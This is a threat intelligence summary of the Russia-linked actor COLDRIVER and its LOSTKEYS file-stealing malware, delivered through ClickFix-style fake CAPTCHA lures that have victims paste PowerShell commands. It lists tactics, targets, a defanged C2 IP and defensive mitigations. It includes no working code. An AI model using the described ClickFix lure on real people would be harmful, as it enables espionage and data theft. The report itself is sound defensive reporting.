Full Report
The Russia-linked threat actor known as COLDRIVER has been observed distributing a new malware called LOSTKEYS as part of an espionage-focused campaign using ClickFix-like social engineering lures. "LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker," the Google Threat
Analysis Summary
# Threat Actor: COLDRIVER
## Attribution & Identity
* **Attribution:** Russia-linked threat actor.
* **Known Aliases/Groups:** Callisto, Star Blizzard, UNC4057.
* **Associated Activity:** Historically known for credential phishing campaigns, but recently observed distributing custom malware for espionage.
## Activity Summary
COLDRIVER has been observed distributing a new malware named **LOSTKEYS** as part of an espionage-focused campaign. This campaign utilized ClickFix-like social engineering lures (fake CAPTCHA verification prompts). The attacks were observed in January, March, and April 2025, targeting current and former advisors to Western governments and militaries, journalists, think tanks, NGOs, and individuals connected to Ukraine. LOSTKEYS is the second custom malware attributed to COLDRIVER after SPICA. Previously, the actor focused on stealing credentials, exfiltrating emails, and stealing contact lists post-compromise. Artifacts linked to LOSTKEYS were also found masquerading as Maltego-related binaries dating back to December 2023, though the direct link to COLDRIVER for these older artifacts is unconfirmed.
## Tactics, Techniques & Procedures
* Social Engineering via decoy websites featuring fake CAPTCHA verification prompts.
* Weaponizing the **ClickFix** technique: Instructing victims to open the Windows Run dialog and paste a pre-copied PowerShell command.
* **Initial Access/Execution:** The pasted PowerShell command downloads and executes a second-stage payload from a remote server.
* **Evasion:** The downloader performs checks likely intended to evade execution in virtual machines.
* **Second-Stage Payload:** A Base64-encoded blob decoded into a PowerShell script responsible for executing the final malware.
* **Data Stealing:** LOSTKEYS exfiltrates system information, running processes, and files based on a hard-coded list of extensions and directories.
* Selective malware deployment, suggesting highly targeted attacks.
* Previously known for credential stealing and email exfiltration from compromised accounts.
## Targeting
* **Sectors:** Western governments (advisors), militaries (advisors), journalism, think tanks, and Non-Governmental Organizations (NGOs).
* **Geography:** Geographies associated with Western governments and individuals connected to Ukraine.
* **Victims:** Current and former advisors to Western governments and militaries, journalists, think tanks, and NGOs.
## Tools & Infrastructure
* **Malware Families Used:**
* LOSTKEYS (New custom malware focused on file and system data theft).
* SPICA (Previously attributed custom malware).
* **Infrastructure (C2, domains, IPs):**
* Remote Server IP: `165.227.148[.]68` (Hosts the initial payload execution components).
## Implications
COLDRIVER is demonstrating an evolution from purely credential phishing to deploying sophisticated, targeted custom espionage malware (LOSTKEYS), suggesting a persistent focus on high-value geopolitical targets related to Western interests and Ukraine. The adoption of file-stealing capabilities post-access indicates a mature intelligence collection capability.
## Mitigations
* Implement rigorous DMARC/SPF/DKIM policies to protect against credential phishing precursors.
* Increase scrutiny of unsolicited prompts or instructions requiring users to paste and execute commands (e.g., PowerShell) from external sources, even if presented via seemingly legitimate or convincing interfaces (Disable/limit execution of direct PowerShell commands from user interaction).
* Monitor endpoints for the execution of multi-stage PowerShell scripts downloaded via web interactions.
* Implement application control to restrict the execution of unknown or unsigned binaries downloaded remotely.
* Deploy endpoint detection and response (EDR) capable of detecting VM/sandbox evasion techniques.